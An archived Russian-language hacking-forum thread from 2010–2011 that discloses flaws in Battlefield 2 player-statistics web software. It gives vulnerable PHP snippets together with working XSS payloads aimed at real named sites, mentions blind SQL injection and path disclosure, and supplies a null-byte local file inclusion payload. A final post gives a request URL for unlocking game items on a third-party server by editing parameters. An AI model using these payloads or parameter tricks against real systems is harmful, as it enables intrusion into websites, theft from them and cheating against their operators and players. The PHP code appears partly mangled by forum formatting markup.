HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу Статистика игрового сервера Battlefield 2
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 12.08.2010, 23:04
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию
BF2 Stat Clone

Скачать: http://upload.com.ua/get/901846173/

Blind SQL Injection:

[QUOTE="None"]
\queries\getPID.php
[PHP]
PHP:
[COLOR="#000000"][COLOR="#007700"]

BF2 Stat 1.4.2

XSS

search.php

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'search_pid'[/COLOR][COLOR="#007700"]] ) {

echo[/COLOR][COLOR="#DD0000"]'Find Player: "'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'search_pid'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]'"'[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$players[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$stats[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]findPlayer[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'search_pid'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'searchAt'[/COLOR][COLOR="#007700"]]);

if([/COLOR][COLOR="#0000BB"]$players[/COLOR][COLOR="#007700"]) {

echo[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

 foreach([/COLOR][COLOR="#0000BB"]$players[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$r[/COLOR][COLOR="#007700"]) echo[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$r[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]nick[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];

 echo[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

 echo[/COLOR][COLOR="#DD0000"]"Not finding your nick? Try to get more specific.
The BF2 stat servers only return 100 matches in a set.
Also, players with a score of 0 are exlcuded."[/COLOR][COLOR="#007700"];

....[/COLOR][/COLOR
Вписываем, Найти Игрока

По ID: ">alert(010010010)

Result: [Пример одного сайта]

Цитата:
Сообщение от None  
http://bf2.vault.ua/stats/player.php?pid=">alert(010010010)

Brainpecker's BF2 Stats v2.12

Autor Website:

http://www.brainpecker.com/

Раскрытие Пути:

Цитата:
Сообщение от None  
http://www.brainpecker.com/bf2_stats_query.php?input1=1111
XSS [Раскрытие пути тоже видны]:

В Поле "Nick or PID 1": alert('xss')

bf2_stats_tables.php

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]additionalSearchResults[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$search_result[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$nick[/COLOR][COLOR="#007700"]) {

 if([/COLOR][COLOR="#0000BB"]count[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$search_result[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#FF8000"]// format output

[/COLOR][COLOR="#0000BB"]$j[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$max[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]count[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$search_result[/COLOR][COLOR="#007700"]);

 for([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$search_result[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]"nick"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$j[/COLOR][COLOR="#007700"]++;

 }

 }

 ....[/COLOR][/COLOR
Result:

Цитата:
Сообщение от None  
http://www.brainpecker.com/bf2_stats_query.php?input1=">alert('xss')
(c)feldmarschall

зы, сорри если что-то ступил(
 
Ответить с цитированием

  #2  
Старый 16.08.2010, 22:18
Unknown
Guest
Сообщений: n/a
Провел на форуме:
6976

Репутация: 4
По умолчанию
Проверять на скули не стал, ибо табл нету, и там каждый файл уязвим. А так читалки файлов ещё куча.

Local File Include

Need: rg=on. mq=off

Цитата:
Сообщение от None  
/sig/sig.php?theme=../../index.php%00
Сохраняем картинку, открываем в блокноте, вуаля HTML код выполненного файла.

/sig/sig.php

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (![/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cachefilename[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#0000BB"]$error[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"BF2Web Down and no cache file exists."[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$mode[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]error[/COLOR][COLOR="#007700"];

 include([/COLOR][COLOR="#DD0000"]"themes/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$theme[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/theme.php"[/COLOR][COLOR="#007700"]);

 exit;

 }

[/COLOR][/COLOR
 
Ответить с цитированием

  #3  
Старый 03.04.2011, 21:48
Stealer
Новичок
Регистрация: 14.02.2010
Сообщений: 1
Провел на форуме:
27607

Репутация: 0
По умолчанию
Открытие анлоков.

http://bf2.u-l.ru/ASP/selectunlock.aspx?pid=252758212&id=99

Где pid - собственно плеер ид, id - идшник анлока.

Идшники анлоков можно взять тут.
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ